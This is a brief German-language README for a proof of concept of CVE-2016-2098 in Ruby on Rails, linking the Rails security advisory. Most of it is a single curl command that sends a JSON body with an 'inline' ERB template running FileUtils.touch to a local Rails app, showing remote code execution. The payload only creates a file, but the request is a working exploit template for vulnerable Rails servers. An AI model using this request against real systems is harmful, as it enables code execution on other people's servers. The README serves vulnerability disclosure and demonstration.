
Proof of Concept, der zeigt, wie CVE-2016-2098 zu Remote-Codeausführung führt.
== README Proof of concept für https://groups.google.com/forum/#!topic/rubyonrails-security/ly-IH-fxr_Q
== Ausnutzung:
rails s aus.curl -v -H "Accept: application/json" -H "Content-type: application/json" -X GET -d ' {"id" : { "inline" : "<%= FileUtils.touch \"rooted\"%>"}}' http://localhost:3000/exploits